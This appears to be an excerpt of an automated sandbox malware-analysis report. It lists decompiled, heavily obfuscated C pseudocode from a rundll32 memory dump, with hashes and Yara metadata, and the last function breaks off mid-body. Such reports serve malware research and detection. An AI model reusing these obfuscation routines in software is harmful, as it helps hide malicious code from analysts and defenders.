                                                                                                                      0x008246d7
                                                                                                                      0x008246df
                                                                                                                      0x008246ec
                                                                                                                      0x008246f0
                                                                                                                      0x008246f8
                                                                                                                      0x00824700
                                                                                                                      0x00824708
                                                                                                                      0x00824710
                                                                                                                      0x00824718
                                                                                                                      0x00824718
                                                                                                                      0x00824726
                                                                                                                      0x00000000
                                                                                                                      0x00824825
                                                                                                                      0x00824732
                                                                                                                      0x0082477f
                                                                                                                      0x00824791
                                                                                                                      0x00824796
                                                                                                                      0x00824799
                                                                                                                      0x0082479c
                                                                                                                      0x0082479e
                                                                                                                      0x008247b6
                                                                                                                      0x008247c7
                                                                                                                      0x008247ca
                                                                                                                      0x008247cf
                                                                                                                      0x008247d2
                                                                                                                      0x00000000
                                                                                                                      0x008247d2
                                                                                                                      0x00824734
                                                                                                                      0x0082473a
                                                                                                                      0x00824778
                                                                                                                      0x00000000
                                                                                                                      0x0082473c
                                                                                                                      0x00824742
                                                                                                                      0x00000000
                                                                                                                      0x00824748
                                                                                                                      0x0082475c
                                                                                                                      0x00824761
                                                                                                                      0x00824766
                                                                                                                      0x00824769
                                                                                                                      0x0082476e
                                                                                                                      0x00824774
                                                                                                                      0x00000000
                                                                                                                      0x00824774
                                                                                                                      0x0082476e
                                                                                                                      0x00824742
                                                                                                                      0x0082473a
                                                                                                                      0x0082482d
                                                                                                                      0x00000000
                                                                                                                      0x0082482d
                                                                                                                      0x008247e3
                                                                                                                      0x008247e7
                                                                                                                      0x008247ec
                                                                                                                      0x008247ef
                                                                                                                      0x008247f2
                                                                                                                      0x008247f4
                                                                                                                      0x00824800
                                                                                                                      0x00000000
                                                                                                                      0x008247f6
                                                                                                                      0x008247f6
                                                                                                                      0x00000000
                                                                                                                      0x008247f6
                                                                                                                      0x00000000
                                                                                                                      0x00824802
                                                                                                                      0x00824802
                                                                                                                      0x00824802
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.510076235.0000000000810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00810000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_810000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: !p$#l</$-C$Y~yd$j>0$w
                                                                                                                      • API String ID: 0-1896768906
                                                                                                                      • Opcode ID: 3a30c4efad81c5cbd4add60a77620eaedfb3d02fbac54a209d8917c006aabcca
                                                                                                                      • Instruction ID: 3061708d5b62e4740e3b0fb1b04814bb50904c91b74d9e54b09c8fba10cdd385
                                                                                                                      • Opcode Fuzzy Hash: 3a30c4efad81c5cbd4add60a77620eaedfb3d02fbac54a209d8917c006aabcca
                                                                                                                      • Instruction Fuzzy Hash: 69A16371908381AFD358CF24D88941BFBF1FBC5358F409A1DF5AA96260E7B589498F83
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0082FC67 Relevance: 6.5, Strings: 5, Instructions: 256COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 97%
                                                                                                                      			E0082FC67(intOrPtr __ecx, intOrPtr* __edx) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr* _v12;
				intOrPtr _v16;
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				intOrPtr _t261;
				intOrPtr* _t266;
				intOrPtr _t273;
				intOrPtr _t274;
				intOrPtr _t275;
				intOrPtr _t281;
				intOrPtr _t282;
				intOrPtr _t283;
				signed int _t307;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				signed int _t311;
				signed int _t312;
				signed int _t313;
				intOrPtr _t314;
				void* _t316;
				intOrPtr _t317;
				intOrPtr _t318;
				intOrPtr _t319;
				signed int* _t320;

				_t275 = __ecx;
				_t320 =  &_v116;
				_v12 = __edx;
				_v28 = __ecx;
				_v8 = 0x8dec59;
				_v4 = 0;
				_v84 = 0xe165d;
				_v84 = _v84 << 7;
				_v84 = _v84 + 0xc1b7;
				_v84 = _v84 ^ 0xc80f2461;
				_v84 = _v84 ^ 0xcf04d456;
				_v32 = 0x655f30;
				_v32 = _v32 + 0x312d;
				_v32 = _v32 ^ 0x0065b82f;
				_v56 = 0xcafed0;
				_v24 = 0;
				_t316 = 0x75256fb;
				_t307 = 0x74;
				_v56 = _v56 / _t307;
				_v56 = _v56 | 0x8b781090;
				_v56 = _v56 ^ 0x8b7ff779;
				_v96 = 0xabe325;
				_v96 = _v96 << 0xd;
				_v96 = _v96 ^ 0xcbcb3531;
				_v96 = _v96 | 0x09a083b5;
				_v96 = _v96 ^ 0xbfa5786a;
				_v76 = 0x7b9c0a;
				_t308 = 0x1c;
				_v76 = _v76 / _t308;
				_v76 = _v76 + 0xffff76d9;
				_v76 = _v76 ^ 0x00066890;
				_v80 = 0xfad268;
				_v80 = _v80 << 0x10;
				_v80 = _v80 ^ 0x68dc041b;
				_v80 = _v80 ^ 0xbab50c4e;
				_v112 = 0x5717c0;
				_v112 = _v112 + 0xd318;
				_v112 = _v112 + 0xffff9813;
				_v112 = _v112 ^ 0x80b72014;
				_v112 = _v112 ^ 0x80e33bd1;
				_v116 = 0x9f285d;
				_v116 = _v116 >> 9;
				_v116 = _v116 + 0xffff6359;
				_v116 = _v116 + 0x4b40;
				_v116 = _v116 ^ 0xfffb57cb;
				_v104 = 0x80a8a2;
				_t309 = 0x29;
				_v104 = _v104 * 0x2c;
				_v104 = _v104 | 0xf3fc02bd;
				_v104 = _v104 * 0x46;
				_v104 = _v104 ^ 0xcf237eb9;
				_v72 = 0x5bfbbd;
				_v72 = _v72 | 0xd3d7b19d;
				_v72 = _v72 << 0xe;
				_v72 = _v72 ^ 0xfee9d95e;
				_v108 = 0xd9b2ce;
				_v108 = _v108 << 0xf;
				_v108 = _v108 + 0xffff979e;
				_v108 = _v108 << 2;
				_v108 = _v108 ^ 0x6594627e;
				_v40 = 0xeed128;
				_v40 = _v40 * 0x34;
				_v40 = _v40 ^ 0x3088f647;
				_v68 = 0x4ae85e;
				_v68 = _v68 / _t309;
				_t310 = 0x35;
				_t319 = _v12;
				_v68 = _v68 * 0x53;
				_v68 = _v68 ^ 0x009a12ab;
				_v60 = 0xe58ccf;
				_v60 = _v60 / _t310;
				_v60 = _v60 >> 9;
				_v60 = _v60 ^ 0x00082ee6;
				_v100 = 0x896781;
				_v100 = _v100 ^ 0xb532ffdf;
				_t311 = 0x3d;
				_v100 = _v100 / _t311;
				_v100 = _v100 >> 0x10;
				_v100 = _v100 ^ 0x0003daf8;
				_v64 = 0xd8c0ce;
				_v64 = _v64 + 0xffffaca0;
				_v64 = _v64 << 0xc;
				_v64 = _v64 ^ 0x86dd78e3;
				_v36 = 0xf932ba;
				_t312 = 0x7f;
				_v36 = _v36 * 0x58;
				_v36 = _v36 ^ 0x55a76b7b;
				_v88 = 0x9f6659;
				_v88 = _v88 / _t312;
				_v88 = _v88 | 0x1ff6fbbf;
				_v88 = _v88 ^ 0xc9c88694;
				_v88 = _v88 ^ 0xd6316d06;
				_v48 = 0x252418;
				_v48 = _v48 ^ 0x008304c1;
				_v48 = _v48 + 0xffff4e21;
				_v48 = _v48 ^ 0x00a4a0c7;
				_v92 = 0xdb5076;
				_v92 = _v92 + 0xffff1b85;
				_v92 = _v92 | 0x2d9bcef8;
				_t313 = 0x68;
				_v92 = _v92 / _t313;
				_v92 = _v92 ^ 0x0076c4f2;
				_v52 = 0x242151;
				_v52 = _v52 | 0x94ee4ace;
				_v52 = _v52 + 0xf8ef;
				_v52 = _v52 ^ 0x94e81f3d;
				_t314 = _v4;
				_t274 = _v8;
				L1:
				while(1) {
					do {
						while(_t316 != 0x1075595) {
							if(_t316 == 0x75256fb) {
								_t316 = 0x1075595;
								continue;
							} else {
								if(_t316 != 0xe0f16ec) {
									goto L15;
								} else {
									_t281 = E0081780B(_v76,  &_v20, _v80, _t275, _v112, _t319, _v116, _t261);
									_t320 =  &(_t320[6]);
									_v24 = _t281;
									if(_t281 == 0) {
										_t317 = _v24;
										L20:
										E00815CDE(_v88, _v48, _v92, _v52, _t274);
									} else {
										_t282 = _v20;
										if(_t282 == 0) {
											goto L16;
										} else {
											_v44 = _v44 + _t282;
											_t319 = _t319 - _t282;
											if(_t319 != 0) {
												L9:
												_t261 = _v44;
												L10:
												_t275 = _v28;
												_t316 = 0xe0f16ec;
												continue;
											} else {
												_t283 = _t314 + _t314;
												_push(_t283);
												_push(_t283);
												_v16 = _t283;
												_t318 = E00822912(_t283);
												if(_t318 == 0) {
													goto L16;
												} else {
													E0082F129(_t274, _v40, _t318, _v68, _t314);
													E00815CDE(_v60, _v100, _v64, _v36, _t274);
													_t319 = _t314;
													_t273 = _t318 + _t314;
													_t314 = _v16;
													_t320 =  &(_t320[6]);
													_v44 = _t273;
													_t274 = _t318;
													if(_t319 == 0) {
														goto L16;
													} else {
														goto L9;
													}
												}
											}
										}
									}
								}
							}
							L18:
							return _t317;
						}
						_t314 = 0x10000;
						_push(_t275);
						_push(_t275);
						_t261 = E00822912(0x10000);
						_t274 = _t261;
						if(_t274 == 0) {
							_t275 = _v28;
							_t316 = 0x6559491;
							goto L15;
						} else {
							_v44 = _t261;
							_t319 = 0x10000;
							goto L10;
						}
						goto L18;
						L15:
						_t261 = _v44;
					} while (_t316 != 0x6559491);
					L16:
					_t317 = _v24;
					if(_t317 == 0) {
						goto L20;
					} else {
						_t266 = _v12;
						 *_t266 = _t274;
						 *((intOrPtr*)(_t266 + 4)) = _t314 - _t319;
					}
					goto L18;
				}
			}





















































                                                                                                                      0x0082fc67
                                                                                                                      0x0082fc67
                                                                                                                      0x0082fc6e
                                                                                                                      0x0082fc72
                                                                                                                      0x0082fc76
                                                                                                                      0x0082fc80
                                                                                                                      0x0082fc87
                                                                                                                      0x0082fc8f
                                                                                                                      0x0082fc94
                                                                                                                      0x0082fc9c
                                                                                                                      0x0082fca4
                                                                                                                      0x0082fcac
                                                                                                                      0x0082fcb4
                                                                                                                      0x0082fcbc
                                                                                                                      0x0082fcc4
                                                                                                                      0x0082fccc
                                                                                                                      0x0082fcd0
                                                                                                                      0x0082fcdd
                                                                                                                      0x0082fce2
                                                                                                                      0x0082fce8
                                                                                                                      0x0082fcf0
                                                                                                                      0x0082fcf8
                                                                                                                      0x0082fd00
                                                                                                                      0x0082fd05
                                                                                                                      0x0082fd0d
                                                                                                                      0x0082fd15
                                                                                                                      0x0082fd1d
                                                                                                                      0x0082fd29
                                                                                                                      0x0082fd2e
                                                                                                                      0x0082fd32
                                                                                                                      0x0082fd3a
                                                                                                                      0x0082fd42
                                                                                                                      0x0082fd4a
                                                                                                                      0x0082fd4f
                                                                                                                      0x0082fd57
                                                                                                                      0x0082fd5f
                                                                                                                      0x0082fd67
                                                                                                                      0x0082fd6f
                                                                                                                      0x0082fd77
                                                                                                                      0x0082fd7f
                                                                                                                      0x0082fd87
                                                                                                                      0x0082fd8f
                                                                                                                      0x0082fd94
                                                                                                                      0x0082fd9c
                                                                                                                      0x0082fda4
                                                                                                                      0x0082fdac
                                                                                                                      0x0082fdb9
                                                                                                                      0x0082fdba
                                                                                                                      0x0082fdbe
                                                                                                                      0x0082fdcb
                                                                                                                      0x0082fdcf
                                                                                                                      0x0082fdd7
                                                                                                                      0x0082fddf
                                                                                                                      0x0082fde7
                                                                                                                      0x0082fdec
                                                                                                                      0x0082fdf4
                                                                                                                      0x0082fdfc
                                                                                                                      0x0082fe01
                                                                                                                      0x0082fe09
                                                                                                                      0x0082fe0e
                                                                                                                      0x0082fe16
                                                                                                                      0x0082fe23
                                                                                                                      0x0082fe27
                                                                                                                      0x0082fe31
                                                                                                                      0x0082fe41
                                                                                                                      0x0082fe4c
                                                                                                                      0x0082fe4f
                                                                                                                      0x0082fe53
                                                                                                                      0x0082fe57
                                                                                                                      0x0082fe5f
                                                                                                                      0x0082fe6f
                                                                                                                      0x0082fe73
                                                                                                                      0x0082fe78
                                                                                                                      0x0082fe80
                                                                                                                      0x0082fe88
                                                                                                                      0x0082fe94
                                                                                                                      0x0082fe99
                                                                                                                      0x0082fe9f
                                                                                                                      0x0082fea4
                                                                                                                      0x0082feac
                                                                                                                      0x0082feb4
                                                                                                                      0x0082febc
                                                                                                                      0x0082fec1
                                                                                                                      0x0082fec9
                                                                                                                      0x0082fed6
                                                                                                                      0x0082fed9
                                                                                                                      0x0082fedd
                                                                                                                      0x0082fee5
                                                                                                                      0x0082fef5
                                                                                                                      0x0082fef9
                                                                                                                      0x0082ff01
                                                                                                                      0x0082ff09
                                                                                                                      0x0082ff11
                                                                                                                      0x0082ff19
                                                                                                                      0x0082ff21
                                                                                                                      0x0082ff29
                                                                                                                      0x0082ff31
                                                                                                                      0x0082ff39
                                                                                                                      0x0082ff41
                                                                                                                      0x0082ff4d
                                                                                                                      0x0082ff50
                                                                                                                      0x0082ff54
                                                                                                                      0x0082ff60
                                                                                                                      0x0082ff68
                                                                                                                      0x0082ff70
                                                                                                                      0x0082ff78
                                                                                                                      0x0082ff80
                                                                                                                      0x0082ff87
                                                                                                                      0x00000000
                                                                                                                      0x0082ff8b
                                                                                                                      0x0082ff8b
                                                                                                                      0x0082ff8b
                                                                                                                      0x0082ff9d
                                                                                                                      0x00830068
                                                                                                                      0x00000000
                                                                                                                      0x0082ffa3
                                                                                                                      0x0082ffa9
                                                                                                                      0x00000000
                                                                                                                      0x0082ffaf
                                                                                                                      0x0082ffcb
                                                                                                                      0x0082ffcd
                                                                                                                      0x0082ffd0
                                                                                                                      0x0082ffd6
                                                                                                                      0x008300d2
                                                                                                                      0x008300d6
                                                                                                                      0x008300e7
                                                                                                                      0x0082ffdc
                                                                                                                      0x0082ffdc
                                                                                                                      0x0082ffe2
                                                                                                                      0x00000000
                                                                                                                      0x0082ffe8
                                                                                                                      0x0082ffe8
                                                                                                                      0x0082ffec
                                                                                                                      0x0082ffee
                                                                                                                      0x00830056
                                                                                                                      0x00830056
                                                                                                                      0x0083005a
                                                                                                                      0x0083005a
                                                                                                                      0x0083005e
                                                                                                                      0x00000000
                                                                                                                      0x0082fff0
                                                                                                                      0x0082fff4
                                                                                                                      0x0082ffff
                                                                                                                      0x00830000
                                                                                                                      0x00830001
                                                                                                                      0x0083000a
                                                                                                                      0x00830010
                                                                                                                      0x00000000
                                                                                                                      0x00830016
                                                                                                                      0x00830022
                                                                                                                      0x00830038
                                                                                                                      0x0083003d
                                                                                                                      0x0083003f
                                                                                                                      0x00830042
                                                                                                                      0x00830049
                                                                                                                      0x0083004c
                                                                                                                      0x00830050
                                                                                                                      0x00830054
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00830054
                                                                                                                      0x00830010
                                                                                                                      0x0082ffee
                                                                                                                      0x0082ffe2
                                                                                                                      0x0082ffd6
                                                                                                                      0x0082ffa9
                                                                                                                      0x008300c9
                                                                                                                      0x008300d1
                                                                                                                      0x008300d1
                                                                                                                      0x00830076
                                                                                                                      0x00830083
                                                                                                                      0x00830084
                                                                                                                      0x00830087
                                                                                                                      0x0083008c
                                                                                                                      0x00830092
                                                                                                                      0x0083009c
                                                                                                                      0x008300a0
                                                                                                                      0x00000000
                                                                                                                      0x00830094
                                                                                                                      0x00830094
                                                                                                                      0x00830098
                                                                                                                      0x00000000
                                                                                                                      0x00830098
                                                                                                                      0x00000000
                                                                                                                      0x008300a5
                                                                                                                      0x008300a5
                                                                                                                      0x008300a9
                                                                                                                      0x008300b5
                                                                                                                      0x008300b5
                                                                                                                      0x008300bb
                                                                                                                      0x00000000
                                                                                                                      0x008300bd
                                                                                                                      0x008300bd
                                                                                                                      0x008300c3
                                                                                                                      0x008300c5
                                                                                                                      0x008300c5
                                                                                                                      0x00000000
                                                                                                                      0x008300bb

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.510076235.0000000000810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00810000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_810000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: -1$0_e$@K$Q!$$^J
                                                                                                                      • API String ID: 0-785566946
                                                                                                                      • Opcode ID: 41ea18c928f5bc6e050d69f8087d6909cd5aff65254f797b7e67a5a6cbd5e357
                                                                                                                      • Instruction ID: cd589747d6493179249261a91f8ffa101b6c187a0f0c77b19dbc59e7b6f07599
                                                                                                                      • Opcode Fuzzy Hash: 41ea18c928f5bc6e050d69f8087d6909cd5aff65254f797b7e67a5a6cbd5e357
                                                                                                                      • Instruction Fuzzy Hash: 44C11EB15083819FC358DF69C48990BFBE1FBC5798F50892DF5A596220D3B1D949CF82
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 00824A1F Relevance: 6.4, Strings: 5, Instructions: 189COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 93%
                                                                                                                      			E00824A1F(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				unsigned int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				void* _t181;
				signed int _t191;
				void* _t203;
				signed int _t204;
				signed int _t205;
				void* _t208;
				signed int _t218;
				intOrPtr* _t219;
				void* _t220;
				signed int* _t223;

				_t219 = _a8;
				_push(_t219);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0081C325(_t181);
				_v4 = _v4 & 0x00000000;
				_t223 =  &(( &_v92)[4]);
				_v12 = 0x6615d4;
				_v8 = 0x63ffda;
				_t220 = 0;
				_v28 = 0xf9afd3;
				_t208 = 0x31efc18;
				_v28 = _v28 >> 7;
				_v28 = _v28 ^ 0x0001f35e;
				_v80 = 0xd84a57;
				_v80 = _v80 << 3;
				_t204 = 0x18;
				_v80 = _v80 * 0x2a;
				_v80 = _v80 + 0x45cf;
				_v80 = _v80 ^ 0x1be1d7fe;
				_v84 = 0xce5c8a;
				_v84 = _v84 + 0xa551;
				_v84 = _v84 * 0x57;
				_v84 = _v84 | 0xfd3f873a;
				_v84 = _v84 ^ 0xff78090e;
				_v52 = 0xb08f91;
				_v52 = _v52 >> 0xc;
				_v52 = _v52 + 0xb2fa;
				_v52 = _v52 ^ 0x000b6173;
				_v56 = 0x674ce5;
				_v56 = _v56 + 0x398f;
				_v56 = _v56 >> 0x10;
				_v56 = _v56 ^ 0x0001bfbd;
				_v88 = 0x67105a;
				_v88 = _v88 * 0x51;
				_v88 = _v88 ^ 0xbb721b0a;
				_v88 = _v88 ^ 0x493680b5;
				_v88 = _v88 ^ 0xd2dd6d54;
				_v60 = 0x6eef31;
				_v60 = _v60 << 6;
				_v60 = _v60 | 0x99e12062;
				_v60 = _v60 ^ 0x9bf73816;
				_v92 = 0x911a2f;
				_v92 = _v92 ^ 0xd10c2d91;
				_v92 = _v92 * 0x5e;
				_v92 = _v92 << 7;
				_v92 = _v92 ^ 0xdd366504;
				_v64 = 0x3fcb13;
				_v64 = _v64 >> 0xf;
				_v64 = _v64 * 6;
				_v64 = _v64 ^ 0x00005971;
				_v44 = 0xc7907a;
				_v44 = _v44 << 0xb;
				_v44 = _v44 >> 0xb;
				_v44 = _v44 ^ 0x000cecb3;
				_v24 = 0x5cb13a;
				_v24 = _v24 | 0x9101a275;
				_v24 = _v24 ^ 0x91595ccd;
				_v48 = 0x23abf4;
				_v48 = _v48 / _t204;
				_v48 = _v48 << 2;
				_v48 = _v48 ^ 0x0009bb3e;
				_v68 = 0x8d9eb5;
				_v68 = _v68 >> 0x10;
				_v68 = _v68 + 0xf044;
				_v68 = _v68 >> 0xe;
				_v68 = _v68 ^ 0x000dd2f9;
				_v20 = 0x3507ed;
				_v20 = _v20 + 0xe3ac;
				_v20 = _v20 ^ 0x00302855;
				_v32 = 0xacaccb;
				_v32 = _v32 ^ 0xc0e60235;
				_t205 = 0x4e;
				_v32 = _v32 * 0x53;
				_v32 = _v32 ^ 0x583b0f23;
				_v36 = 0x7d6507;
				_v36 = _v36 + 0xffff02b5;
				_t191 = _v36;
				_t218 = _t191 % _t205;
				_v36 = _t191 / _t205;
				_v36 = _v36 ^ 0x0005008b;
				_v40 = 0xd19b6c;
				_v40 = _v40 | 0xa0bb2537;
				_v40 = _v40 + 0xffff1d7c;
				_v40 = _v40 ^ 0xa0fa32c2;
				_v72 = 0xc60854;
				_v72 = _v72 | 0x85b2e473;
				_v72 = _v72 + 0x7f84;
				_v72 = _v72 * 0x36;
				_v72 = _v72 ^ 0x423e0813;
				_v76 = 0xd43520;
				_v76 = _v76 + 0x4339;
				_v76 = _v76 + 0xffffe1a4;
				_v76 = _v76 >> 0xd;
				_v76 = _v76 ^ 0x000c8c56;
				do {
					while(_t208 != 0x2557e54) {
						if(_t208 == 0x31efc18) {
							_t208 = 0xe841cef;
							continue;
						} else {
							if(_t208 == 0xa700901) {
								E0081A667(_a4, _t218, _v68,  &_v16, _v20, _t208, _v32, _t220, _v36, _v40, _t208, _v72, _v76, _v80);
								 *_t219 = _v16;
							} else {
								if(_t208 != 0xe841cef) {
									goto L11;
								} else {
									_t203 = E0081A667(_a4, _t218, _v84,  &_v16, _v52, _t208, _v56, 0, _v88, _v60, _t208, _v92, _v64, _v28);
									_t223 =  &(_t223[0xc]);
									if(_t203 != 0) {
										_t208 = 0x2557e54;
										continue;
									}
								}
							}
						}
						L14:
						return _t220;
					}
					_push(_t208);
					_push(_t208);
					_t220 = E00822912(_v16);
					if(_t220 == 0) {
						_t208 = 0x2fabbe9;
						goto L11;
					} else {
						_t208 = 0xa700901;
						continue;
					}
					goto L14;
					L11:
				} while (_t208 != 0x2fabbe9);
				goto L14;
			}




































                                                                                                                      0x00824a26
                                                                                                                      0x00824a2a
                                                                                                                      0x00824a2b
                                                                                                                      0x00824a2f
                                                                                                                      0x00824a30
                                                                                                                      0x00824a31
                                                                                                                      0x00824a36
                                                                                                                      0x00824a3b
                                                                                                                      0x00824a3e
                                                                                                                      0x00824a48
                                                                                                                      0x00824a50
                                                                                                                      0x00824a52
                                                                                                                      0x00824a5a
                                                                                                                      0x00824a5f
                                                                                                                      0x00824a64
                                                                                                                      0x00824a6c
                                                                                                                      0x00824a74
                                                                                                                      0x00824a80
                                                                                                                      0x00824a81
                                                                                                                      0x00824a85
                                                                                                                      0x00824a8d
                                                                                                                      0x00824a95
                                                                                                                      0x00824a9d
                                                                                                                      0x00824aaa
                                                                                                                      0x00824aae
                                                                                                                      0x00824ab6
                                                                                                                      0x00824abe
                                                                                                                      0x00824ac6
                                                                                                                      0x00824acb
                                                                                                                      0x00824ad3
                                                                                                                      0x00824adb
                                                                                                                      0x00824ae3
                                                                                                                      0x00824aeb
                                                                                                                      0x00824af0
                                                                                                                      0x00824af8
                                                                                                                      0x00824b05
                                                                                                                      0x00824b09
                                                                                                                      0x00824b11
                                                                                                                      0x00824b19
                                                                                                                      0x00824b21
                                                                                                                      0x00824b29
                                                                                                                      0x00824b2e
                                                                                                                      0x00824b36
                                                                                                                      0x00824b3e
                                                                                                                      0x00824b46
                                                                                                                      0x00824b53
                                                                                                                      0x00824b57
                                                                                                                      0x00824b5c
                                                                                                                      0x00824b64
                                                                                                                      0x00824b6c
                                                                                                                      0x00824b76
                                                                                                                      0x00824b7a
                                                                                                                      0x00824b82
                                                                                                                      0x00824b8a
                                                                                                                      0x00824b8f
                                                                                                                      0x00824b94
                                                                                                                      0x00824b9c
                                                                                                                      0x00824ba4
                                                                                                                      0x00824bac
                                                                                                                      0x00824bb4
                                                                                                                      0x00824bc2
                                                                                                                      0x00824bc6
                                                                                                                      0x00824bcb
                                                                                                                      0x00824bd3
                                                                                                                      0x00824bdb
                                                                                                                      0x00824be0
                                                                                                                      0x00824be8
                                                                                                                      0x00824bed
                                                                                                                      0x00824bf5
                                                                                                                      0x00824bff
                                                                                                                      0x00824c0c
                                                                                                                      0x00824c14
                                                                                                                      0x00824c1c
                                                                                                                      0x00824c2b
                                                                                                                      0x00824c2c
                                                                                                                      0x00824c30
                                                                                                                      0x00824c38
                                                                                                                      0x00824c40
                                                                                                                      0x00824c48
                                                                                                                      0x00824c4c
                                                                                                                      0x00824c53
                                                                                                                      0x00824c57
                                                                                                                      0x00824c5f
                                                                                                                      0x00824c67
                                                                                                                      0x00824c6f
                                                                                                                      0x00824c77
                                                                                                                      0x00824c7f
                                                                                                                      0x00824c87
                                                                                                                      0x00824c8f
                                                                                                                      0x00824c9c
                                                                                                                      0x00824ca0
                                                                                                                      0x00824ca8
                                                                                                                      0x00824cb0
                                                                                                                      0x00824cb8
                                                                                                                      0x00824cc0
                                                                                                                      0x00824cc5
                                                                                                                      0x00824ccd
                                                                                                                      0x00824ccd
                                                                                                                      0x00824cd7
                                                                                                                      0x00824d2d
                                                                                                                      0x00000000
                                                                                                                      0x00824cd9
                                                                                                                      0x00824cdb
                                                                                                                      0x00824d9c
                                                                                                                      0x00824dab
                                                                                                                      0x00824ce1
                                                                                                                      0x00824ce7
                                                                                                                      0x00000000
                                                                                                                      0x00824ce9
                                                                                                                      0x00824d19
                                                                                                                      0x00824d1e
                                                                                                                      0x00824d23
                                                                                                                      0x00824d29
                                                                                                                      0x00000000
                                                                                                                      0x00824d29
                                                                                                                      0x00824d23
                                                                                                                      0x00824ce7
                                                                                                                      0x00824cdb
                                                                                                                      0x00824dae
                                                                                                                      0x00824db6
                                                                                                                      0x00824db6
                                                                                                                      0x00824d40
                                                                                                                      0x00824d41
                                                                                                                      0x00824d4b
                                                                                                                      0x00824d51
                                                                                                                      0x00824d5a
                                                                                                                      0x00000000
                                                                                                                      0x00824d53
                                                                                                                      0x00824d53
                                                                                                                      0x00000000
                                                                                                                      0x00824d53
                                                                                                                      0x00000000
                                                                                                                      0x00824d5f
                                                                                                                      0x00824d5f
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.510076235.0000000000810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00810000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_810000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 1n$9C$U(0$qY$Lg
                                                                                                                      • API String ID: 0-890920262
                                                                                                                      • Opcode ID: 3dd90d24197c6e0eb425be8a52b4512aac5aa0624a9b5daf25ccf20776c8ba82
                                                                                                                      • Instruction ID: fe70e62104c088d6fcaa5705d5ed9f12b5b6b9ac49bf7771bf351d6970182af8
                                                                                                                      • Opcode Fuzzy Hash: 3dd90d24197c6e0eb425be8a52b4512aac5aa0624a9b5daf25ccf20776c8ba82
                                                                                                                      • Instruction Fuzzy Hash: C2910FB14093819FC358CF65D58A81BFBF1FB94748F105A0DF2A596260D3B68A88CF83
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0082482E Relevance: 6.4, Strings: 5, Instructions: 107COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 100%
                                                                                                                      			E0082482E(void* __ecx) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				void* _t103;
				void* _t104;
				void* _t107;
				signed int _t109;
				signed int _t110;
				void* _t119;
				void* _t120;
				signed int* _t122;

				_t122 =  &_v40;
				_v16 = 0x36dfa5;
				_v16 = _v16 + 0x3b08;
				_t107 = __ecx;
				_t119 = 0;
				_t109 = 0x6b;
				_v16 = _v16 / _t109;
				_v16 = _v16 ^ 0x0008b2f0;
				_t120 = 0x25318c3;
				_v32 = 0xe406cb;
				_v32 = _v32 + 0xf1ff;
				_v32 = _v32 << 0xd;
				_t110 = 0x38;
				_v32 = _v32 / _t110;
				_v32 = _v32 ^ 0x02d3dd20;
				_v36 = 0x75fef9;
				_v36 = _v36 >> 0xe;
				_v36 = _v36 + 0x1d86;
				_v36 = _v36 | 0xca94675a;
				_v36 = _v36 ^ 0xca99002d;
				_v20 = 0xf78cd;
				_v20 = _v20 * 0x50;
				_v20 = _v20 >> 4;
				_v20 = _v20 ^ 0x004e8f0d;
				_v24 = 0x451f1c;
				_v24 = _v24 + 0xffffecca;
				_v24 = _v24 + 0xffffe02c;
				_v24 = _v24 ^ 0x0044bfd9;
				_v40 = 0xfdbfec;
				_v40 = _v40 << 8;
				_v40 = _v40 + 0x2a17;
				_v40 = _v40 ^ 0x2ee485ab;
				_v40 = _v40 ^ 0xd32b8602;
				_v28 = 0xc36f29;
				_v28 = _v28 >> 0xa;
				_v28 = _v28 + 0xffff93a5;
				_v28 = _v28 ^ 0xfffd5496;
				_v4 = 0xb22cca;
